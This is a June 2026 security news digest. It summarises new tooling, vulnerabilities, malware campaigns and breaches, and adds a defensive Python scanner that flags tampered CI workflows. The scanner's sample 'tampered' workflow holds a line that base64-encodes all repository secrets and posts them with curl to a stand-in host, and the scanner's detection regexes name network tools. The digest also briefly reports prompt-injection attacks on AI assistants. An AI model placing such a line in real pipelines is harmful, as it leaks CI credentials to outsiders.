New Tooling
- Open-Source CI/CD Abuse Detector Guards Against Stolen Credential Attacks
"CI/CD Abuse Detector is an open-source project that uses a large language model to flag suspicious changes to continuous integration and continuous deployment pipelines, workflows, and automation configurations. The repository contains drop-in templates for GitHub Actions, GitLab CI, and Azure DevOps. The project targets a common attack chain in software supply chain compromises. Stolen developer credentials are used to push modifications to workflow files, which then harvest secrets stored in the CI environment. The detector aims to catch these modifications during code review, before the altered workflow executes."
https://www.helpnetsecurity.com/2026/06/15/ci-cd-abuse-detector-open-source/
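As an added example (not the CI/CD Abuse Detector's own code, which uses a language model rather than fixed rules), the following Python script shows the kind of pre-merge check the item describes: it diffs a reviewed workflow against a proposed revision and flags only the changed lines that match the secret-harvesting pattern (a secret piped into a network tool, a dump of all secrets, a trigger switched to `pull_request_target` with checkout of the PR head, an action pin loosened from a commit SHA to a branch). The two workflow texts, the rule names, the placeholder SHA and the host allowlist are constructed for this illustration.

```python
import difflib
import re
from typing import Iterator, List, NamedTuple


class Finding(NamedTuple):
    rule: str
    lineno: int  # 1-based line in the proposed workflow
    detail: str


# Heuristics for the workflow-tampering pattern described above. Rule names,
# regexes and the host allowlist are this example's own choices, not the project's.
SECRET_REF = re.compile(r"\$\{\{\s*(secrets\.|toJSON\(\s*secrets\s*\))")
NETWORK_TOOL = re.compile(r"\b(curl|wget|nc|ncat|Invoke-WebRequest|Invoke-RestMethod)\b")
ENCODER = re.compile(r"\b(base64|xxd|openssl\s+enc|gzip)\b")
USES_LINE = re.compile(r"^\s*-?\s*uses:\s*([^@\s]+)@(\S+)")
SHA_PIN = re.compile(r"^[0-9a-f]{40}$")
URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)")
ALLOWED_HOSTS = frozenset({"github.com", "api.github.com", "objects.githubusercontent.com"})


def _check_line(lineno: int, line: str, allowed_hosts) -> Iterator[Finding]:
    text = line.strip()
    has_secret = bool(SECRET_REF.search(line))
    if re.search(r"\bpull_request_target\b", line):
        yield Finding("dangerous-trigger", lineno, text)
    if re.search(r"\bref:", line) and "github.event.pull_request.head" in line:
        yield Finding("pr-head-checkout", lineno, text)
    if "toJSON(secrets)" in line or re.search(r"\brun:\s*(env|printenv)\b", line):
        yield Finding("secrets-dump", lineno, text)
    if has_secret and NETWORK_TOOL.search(line):
        yield Finding("secret-to-network", lineno, text)
    if has_secret and ENCODER.search(line):
        yield Finding("secret-encoding", lineno, text)
    for host in URL_HOST.findall(line):
        if host.lower() not in allowed_hosts:
            yield Finding("unexpected-host", lineno, host)


def scan_workflow_change(old: str, new: str, allowed_hosts=ALLOWED_HOSTS) -> List[Finding]:
    """Flag risky lines that a proposed workflow revision adds or changes.

    Only lines that differ from the reviewed baseline are checked, so a
    legitimate, already-reviewed use of a secret is not re-reported on every edit.
    """
    old_lines, new_lines = old.splitlines(), new.splitlines()
    # Remember how each action was pinned in the baseline to catch SHA -> tag/branch.
    old_pins = {m.group(1): m.group(2) for m in map(USES_LINE.match, old_lines) if m}
    findings: List[Finding] = []
    for tag, _i1, _i2, j1, j2 in difflib.SequenceMatcher(None, old_lines, new_lines).get_opcodes():
        if tag not in ("insert", "replace"):
            continue
        for j in range(j1, j2):
            line = new_lines[j]
            findings.extend(_check_line(j + 1, line, allowed_hosts))
            m = USES_LINE.match(line)
            if m:
                action, ref = m.groups()
                was = old_pins.get(action)
                if was and SHA_PIN.match(was) and not SHA_PIN.match(ref):
                    findings.append(Finding("pin-loosened", j + 1, f"{action}@{was[:12]} -> @{ref}"))
    return findings


# Constructed sample: a reviewed baseline (placeholder SHA pin) and a tampered
# revision of the kind the project targets. No real repository or secrets involved.
BASELINE = """\
name: ci
on:
  pull_request:
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@0123456789abcdef0123456789abcdef01234567
      - name: Build
        run: make build
      - name: Publish
        run: ./scripts/publish.sh
        env:
          NPM_TOKEN: ${{ secrets.NPM_TOKEN }}
"""

TAMPERED = """\
name: ci
on:
  pull_request_target:
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@main
        with:
          ref: ${{ github.event.pull_request.head.sha }}
      - name: Build
        run: make build
      - name: Warm cache
        run: echo '${{ toJSON(secrets) }}' | base64 -w0 | curl -s --data-binary @- https://ci-cache.example.net/warm
      - name: Publish
        run: ./scripts/publish.sh
        env:
          NPM_TOKEN: ${{ secrets.NPM_TOKEN }}
"""

if __name__ == "__main__":
    for f in scan_workflow_change(BASELINE, TAMPERED):
        print(f"{f.rule:18} line {f.lineno:3}: {f.detail}")
```

Run it as a required check on the base and head versions of every file under `.github/workflows/` (the same idea applies to `.gitlab-ci.yml` and Azure Pipelines YAML with adjusted rules); any finding is a reason to hold the merge until a human has read the diff, because once merged the altered workflow runs with the repository's secrets. The rules are deliberately narrow: they miss obfuscated exfiltration (an LLM-based reviewer is meant to cover that gap), but they are cheap, deterministic and produce no findings on a benign change.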
Vulnerabilities
- CVE-2026-48558: SimpleHelp Authentication Bypass Indicators Of Compromise
"At Horizon3.ai, we have been experimenting with generative AI heavily across all areas of work. One area I commonly work in is vulnerability research. Early in 2026, and inspired by DARPA’s AIxCC, I ventured into creating an autonomous vulnerability research pipeline that would re-implement my research methodologies and hopefully find real, exploitable vulnerabilities. This internal initiative is codenamed “Sua Sponte” – latin for “Of its own accord”."
https://horizon3.ai/attack-research/disclosures/cve-2026-48558-simplehelp-authentication-bypass-iocs/
https://www.bleepingcomputer.com/news/security/simplehelp-bug-lets-hackers-create-rogue-remote-support-accounts/
- CISA Adds Two Known Exploited Vulnerabilities To Catalog
"CISA has added two new vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.
CVE-2026-20262 Cisco Catalyst SD-WAN Manager Directory or Path Traversal Vulnerability
CVE-2026-54420 LiteSpeed cPanel Plugin UNIX Symbolic Link (Symlink) Following Vulnerability"
https://www.cisa.gov/news-events/alerts/2026/06/15/cisa-adds-two-known-exploited-vulnerabilities-catalog
- Cisco Fixes SD-WAN vManage Flaw Exploited In Zero-Day Attacks
"Cisco has released security updates to address a vulnerability in the Catalyst SD-WAN Manager, tracked as CVE-2026-20262, that was exploited in attacks to escalate to root privileges. Formerly known as SD-WAN vManage, this network management software allows admins to manage up to 6,000 SD-WAN devices from a single dashboard. The now-patched zero-day security flaw affects all deployment types, regardless of device configuration, including on-prem deployments, Cisco SD-WAN Cloud-Pro, Cisco SD-WAN Cloud (Cisco Managed), and Cisco SD-WAN for Government (FedRAMP)."
https://www.bleepingcomputer.com/news/security/cisco-fixes-sd-wan-vmanage-flaw-exploited-in-zero-day-attacks/
https://www.theregister.com/patches/2026/06/15/cisco-sd-wan-make-me-root-bug-under-attack/5255916
- SearchLeak: How We Turned M365 Copilot Into a One-Click Data Exfiltration Weapon
"Varonis Threat Labs has uncovered a new three-stage vulnerability chain that turns Microsoft 365 Copilot Enterprise Search into a silent data exfiltration weapon. Dubbed SearchLeak, the chain combines a relatively new class of AI-specific vulnerability known as Parameter-to-Prompt Injection (P2P) with two classic web security bugs: an HTML injection race condition and a server-side request forgery (SSRF)."
https://www.varonis.com/blog/searchleak
https://thehackernews.com/2026/06/one-click-microsoft-365-copilot-flaw.html
https://www.bleepingcomputer.com/news/security/new-attack-turned-microsoft-365-copilot-into-1-click-data-theft-tool/
https://www.darkreading.com/application-security/copilot-searchleak-attack-1-click-data-theft
- LiteLLM Vulnerability Chain Lets Low-Privilege Users Take Over AI Gateway Servers
"A default low-privilege account on a LiteLLM proxy can climb to full admin and run code on the server by chaining three vulnerabilities, researchers at Obsidian Security disclosed. LiteLLM is a widely deployed open-source AI gateway that brokers calls to more than 100 model providers behind one OpenAI-compatible interface. A server takeover exposes every provider key it holds, the secrets that decrypt its stored credentials, and every prompt and response passing through it."
https://thehackernews.com/2026/06/litellm-vulnerability-chain-lets-low.html
Malware
- Android.MagicAd Trojan Displays Ads Despite All Restrictions
"Doctor Web’s experts have discovered Android.MagicAd, a trojan that bypasses Android OS restrictions in various ways to display background ads. One of these methods is universal, while the others are designed for devices from specific manufacturers. These include exploiting third-party software and using the system media player."
https://news.drweb.com/show/?i=15262&lng=en
https://hackread.com/android-apps-magicad-trojan-official-stores/
- PhishLumos: Exposing Phishing Campaigns That Evade Detection By Hiding Content
"Phishing remains one of the most stubbornly persistent threats in cybersecurity: humans are tired, distracted, trusting, and susceptible to urgency and authority in ways that no amount of awareness training can completely overcome. The security community has largely accepted this reality and shifted focus toward automated detection systems that can intercept and block phishing threats before users see them."
https://www.helpnetsecurity.com/2026/06/15/phishlumos-phishing-campaign-detection/
https://ieeexplore.ieee.org/document/11534625/authors
- A Hardware Neural Network Backdoor That Hides In Plain Sight
"Deep learning systems on phones, cars, and other edge devices increasingly run on custom silicon. Specialized chips such as FPGAs and ASICs give these systems the speed and low power consumption that edge applications need. Many of these chips come from third-party design houses and foundries, which adds steps to the supply chain where an outside party can alter a device. Researchers at the University of Tennessee and the University of Florida built an attack that takes advantage of this arrangement. The attack, called HAMLOCK, short for Hardware-Model Logically Combined Attack, divides a backdoor into two parts and places them on opposite sides of the hardware and software boundary."
https://www.helpnetsecurity.com/2026/06/15/hardware-neural-network-backdoor-research/
- 152 Chrome Live Wallpaper Extensions Hid Ad Tracking And Faked Google Search Traffic
"Socket's Threat Research Team identified a family of 152 Chrome Web Store new-tab "live wallpaper" extensions, built from one shared codebase but distributed across 38 separate Chrome Web Store publisher accounts and three brand backends, carrying a combined total of approximately 105,000 reported installs. Every listing declares on the Chrome Web Store that it will not collect or use user data, while the linked privacy policy admits the opposite: that the extensions log IP addresses, ISP, click counts, and referrers and share that data with Google AdSense, DoubleClick, and third-party ad partners."
https://socket.dev/blog/152-chrome-live-wallpaper-extensions-hid-ad-tracking
https://thehackernews.com/2026/06/152-chrome-wallpaper-extensions-with.html
- OptinMonster Supply Chain Attack Hits 1.2 Million Sites
"Sansec discovered an active supply-chain attack hitting over 1.2 million sites that use the popular OptinMonster, TrustPulse and PushEngage WordPress plugins, all operated by WordPress giant Awesome Motive. Attackers added malicious JavaScript to the legitimate files served by Awesome Motive, which are embedded in their customers' sites. The malware waits for a logged-in administrator, creates a backdoor admin account, and installs a self-hiding backdoor plugin. It then sends the new credentials to tidio.cc, a lookalike of the real tidio.com. The campaign is ongoing as of 13 June 2026."
https://sansec.io/research/optinmonster-supply-chain-attack
https://thehackernews.com/2026/06/popular-wordpress-plugin-scripts.html
https://www.bleepingcomputer.com/news/security/optinmonster-wordpress-plugin-hacked-in-cdn-supply-chain-attack/
https://securityaffairs.com/193616/malware/supply-chain-attack-hits-popular-wordpress-plugins-through-awesome-motive-cdn.html
https://www.infosecurity-magazine.com/news/wordpress-plugin-supply-chain/
- UNC1151/Ghostwriter Phishing Campaign Targeting Gmail Accounts
"The UNC1151/Ghostwriter group remains one of the most active APT groups monitored by the CERT Polska team. For many years, it has consistently conducted phishing campaigns aimed at gaining access to the email accounts of Polish citizens. Once compromised, attackers search for valuable information on these accounts, such as contact lists (used to identify further targets), sensitive documents, or linked accounts (e.g., social media). These linked accounts can then be taken over."
https://cert.pl/en/posts/2026/06/UNC1151-gmail-campaign/
https://therecord.media/ghostwriter-targets-personal-gmail-accounts-in-poland
- The Gentlemen Ransomware: 483 Victims And a Leaked Playbook
"The Gentlemen, a ransomware-as-a-service crew active since around September 2025, has now listed 483 victims on its dark-web leak site, including 380 in 2026 alone, according to Ransomtracker data Ransomnews pulled on 13 June 2026. A May 2026 leak of the gang’s internal chat logs exposed a nine-person core, AI-assisted tooling, and an intrusion model built on stolen infostealer credentials. The group is active and still listing victims weekly."
https://ransomnews.com/the-gentlemen-ransomware-2026/
https://securityaffairs.com/193622/uncategorized/infostealers-ai-and-a-90-affiliate-cut-fuel-the-gentlemen-groups-rise.html
- FBI: Fraudsters Use Couriers To Steal Money In Crypto Scams
"The U.S. Federal Bureau of Investigation (FBI) warned that criminals are using couriers to collect money from victims of cryptocurrency investment scams, also known as pig butchering or romance baiting. Such scams usually start with the fraudsters reaching out to their targets via social media, dating sites, and messaging apps, building trust, and then luring victims into fake investment schemes. However, instead of investing their funds, the scammers will steal the money by moving it into accounts under their control."
https://www.bleepingcomputer.com/news/security/fbi-fraudsters-use-couriers-to-steal-money-in-crypto-scams/
https://www.ic3.gov/PSA/2026/PSA260615
- Public And Private Medical Community Targeted By China-Nexus Threat Actor Pursuing Artificial Intelligence, Cyber, Medical, And National Defense Research
"Google Threat Intelligence Group (GTIG) has identified a sophisticated campaign attributed to UNC6508, a People's Republic of China (PRC)-nexus threat actor, targeting institutions in the North American academic, medical, and military research community. While remaining undetected for over a year, the threat actor compromised externally facing web applications, deployed bespoke malware, pivoted to sensitive internal systems, and abused enterprise administrative tools for covert data exfiltration. The threat actor had broad collection aspirations, including sensitive defense intelligence related to national security, Indo-Pacific command operations, artificial intelligence, uncrewed vehicle systems, cyber offensive programs, and medical research."
https://cloud.google.com/blog/topics/threat-intelligence/prc-targets-us-medical-research
https://www.bleepingcomputer.com/news/security/chinese-hackers-breach-redcap-servers-steal-medical-research/
https://thehackernews.com/2026/06/chinese-hackers-abused-google-workspace.html
https://www.darkreading.com/threat-intelligence/china-nexus-actor-us-researchers-undetected
https://cyberscoop.com/google-unc6508-china-espionage-threat/
https://www.securityweek.com/chinese-hackers-target-medical-military-and-ai-research-in-north-america/
https://www.theregister.com/research/2026/06/15/google-says-prc-linked-spies-hid-in-medical-research-networks-for-more-than-a-year/5254547
https://www.helpnetsecurity.com/2026/06/15/chinese-hackers-redcap-medical-research-institutions-breach/
- The Anubis Ransomware Attack On The Adriatic Port Authority
"A severe ransomware attack orchestrated by the Anubis ransomware group targeted the Adriatic Port Authority, crippling its operations and disrupting maritime logistics across the region. This cyberattack has raised significant concerns about the vulnerabilities in critical infrastructure. Considering ongoing global supply chain disruptions and the emergence of new threats in the maritime security domain, Resecurity forecasts an increase in malicious activity by nation-states, cyber-mercenaries, advanced cybercriminal and espionage groups. Ransomware attacks have repeatedly targeted port authorities and maritime operations across countries, causing widespread disruption and massive financial losses. Below are confirmed cybersecurity incidents:"
https://www.resecurity.com/blog/article/the-anubis-ransomware-attack-on-the-adriatic-port-authority
https://www.infosecurity-magazine.com/news/anubis-ransomware-adriatic-port/
- Inside a Malicious Infrastructure Delivering EtherRAT, Phishing Pages, And Malicious Software
"During our recent threat hunting activities, we found EtherRAT malware being distributed by a website with a strange homepage. This homepage allowed us to discover a vast malicious infrastructure distributing malware, malicious documents, remote desktop software, and phishing pages. EtherRAT is a RAT developed in Node.js which allows an attacker to gain complete control over the machine and execute arbitrary code returned by the Command and Control (C2) server. The malware uses the Ethereum blockchain to obtain the C2 server, hence the “Ether” part of the name. EtherRAT is typically distributed via MSI, PowerShell, or JavaScript scripts."
https://www.malwarebytes.com/blog/threat-intel/2026/06/inside-a-malicious-infrastructure-delivering-etherrat-phishing-pages-and-malicious-software
Breaches/Hacks/Leaks
- ShinyHunters Claims Council Of Europe Hack
"The notorious extortion group ShinyHunters claims to have hacked the Council of Europe and to have stolen nearly 300 gigabytes of data. Europe’s leading human rights organization and an official United Nations observer, the Council of Europe was founded in 1949 and includes 46 member states, including 27 European Union countries. On Sunday, ShinyHunters added the Council of Europe to its Tor-based leak site, threatening to release more than 297 GB of data allegedly stolen from the organization’s network."
https://www.securityweek.com/shinyhunters-claims-council-of-europe-hack/
https://www.bleepingcomputer.com/news/security/council-of-europe-investigates-shinyhunters-data-breach-claims/
https://www.theregister.com/cyber-crime/2026/06/15/council-of-europe-hacked-in-shinyhunters-peoplesoft-heist/5255757
- Infinite Campus Data Breach Affects 137,000 School Staff Accounts
"The ShinyHunters extortion gang stole personal information from more than 137,000 school staff accounts in a Salesforce data theft attack that targeted the widely used Infinite Campus K-12 student information system in March. Infinite Campus is an education technology (EdTech) company that provides a student information system (SIS) to over 3,200 school districts across the United States, managing data for 11 million students in 46 states."
https://www.bleepingcomputer.com/news/security/infinite-campus-data-breach-affects-137-000-school-staff-accounts/
- Cyberattack On Russian Tech Firm Astral Disrupts Business, Government Services For Week
"The Russian software company Kaluga Astral said on Monday that it had been hit by a cyberattack earlier this month that disrupted several of its services for about a week, affecting customers that rely on its software for tax reporting, electronic document management and other business operations. “We are bringing each service back online only after completing a full security review — we are not willing to compromise security for the sake of speed. That is why the recovery process is taking longer than we would like,” the company said."
https://therecord.media/cyberattack-on-russian-tech-firm-astral-disrupts-business-government-services
General News
- Onspring CISO On Where Automated GRC Systems Fall Short
"In this interview with Help Net Security, Nichole Windholz, CISO at Onspring, talks about the limits of automated GRC systems and continuous control monitoring. She explains why color-coded dashboards can hide nuance, how teams can check the data feeding their tools, and which risks resist measurement, such as insider behavior and vendor concentration."
https://www.helpnetsecurity.com/2026/06/15/nichole-windholz-onspring-automated-grc-systems/
- Senior Engineers Are Spending Their Week Cleaning Up AI-Generated Code
"At most U.S. technology companies, machines now write the bulk of the code that ships each week. The engineer’s job has shifted toward reviewing what the AI produces, and that review gives the code high marks. Leaders rate AI-generated code as higher quality than the code their own people write, praising its clean structure, consistent style, and low count of obvious bugs at submission time. The same code behaves worse once it runs. Production incidents have climbed over the past year. Senior engineers spend more of their time fixing what the AI generated. A large majority of organizations hit at least one production failure tied to AI code in the past six months, and a sizable share of that code goes back for repair soon after it ships."
https://www.helpnetsecurity.com/2026/06/15/ai-generated-code-review-issues/
- When AI Leaves The Lab: Testing Frontier Models In Government Cyber Defence
"The Government Cyber Action Plan aims to boost cyber resilience across the UK public sector by using emerging technologies to manage risk. The Government Cyber Coordination Centre (GC3) - a partnership between the NCSC and the Department for Science, Innovation and Technology - is leading this work, exploring how frontier AI can be applied safely to cyber defence across government."
https://www.gov.uk/government/case-studies/when-ai-leaves-the-lab-testing-frontier-models-in-government-cyber-defence
https://www.infosecurity-magazine.com/news/uk-government-400-vulnerabilities/
- Energy, Healthcare, And Finance: Why Midwest Industries Are Facing Surging Cyber Attacks
"Across the United States, the average organization faced slightly fewer cyber attacks per week in May 2026 than it did a year earlier, according to Check Point Research — the national figure was essentially flat year over year. In the Central US, however, the trend ran the other way. Organizations there faced more attacks than a year ago, and more than the national average — as they did in every month of 2026."
https://blog.checkpoint.com/usa/energy-healthcare-and-finance-why-midwest-industries-are-facing-surging-cyber-attacks/
- Travel Phishing And Cyber Attacks Are Surging In 2026, Growing 122% Over The Last 3 Years. Here’s What Cyber Criminals Are Actually Doing
"Every summer, hundreds of millions of people book flights, reserve hotels, and plan vacations online. And every summer, cyber criminals show up to take advantage of exactly that. Check Point Research tracked the threat landscape heading into the 2026 summer travel season, and what they found should give travelers pause before they click “confirm booking.”"
https://blog.checkpoint.com/research/travel-phishing-and-cyber-attacks-are-surging-in-2026-growing-122-over-the-last-3-years-heres-what-cyber-criminals-are-actually-doing/
- The Beginning Of The End Of Social Engineering
"Over the past month, the world's largest technology companies have quietly converged on the same idea. In May, Google positioned Gemini as an increasingly integrated part of Android. This week, Apple expanded Apple Intelligence across the iPhone, iPad, and Mac. While much of the attention has focused on productivity and convenience, a more significant shift may be underway. For the first time, operating systems are beginning to move beyond simply executing commands and displaying information. They are becoming active participants in interpreting what users see, hear, receive, and trust."
https://www.darkreading.com/cyberattacks-data-breaches/beginning-end-social-engineering
- AI Vulnerability Discovery Is Pushing 2026 CVEs Toward 66,000
"Vulnerability disclosures are piling up faster in 2026 than anyone expected at the start of the year. The running count for the first few months sits well above the original projection, and the Forum of Incident Response and Security Teams (FIRST) now expects the year to land near 66,000 CVEs. The cause sits mostly with one development: AI tools have started hunting for software flaws on their own, and they are good at it. “The teams that will weather the vulnerability storm of 2026 are the ones with trusted networks already in place, who are sharing intelligence and are coordinating response before any crises hit,” said Chris Gibson, CEO of FIRST."
https://www.helpnetsecurity.com/2026/06/15/first-2026-cve-forecast/
References
Electronic Transactions Development Agency (ETDA)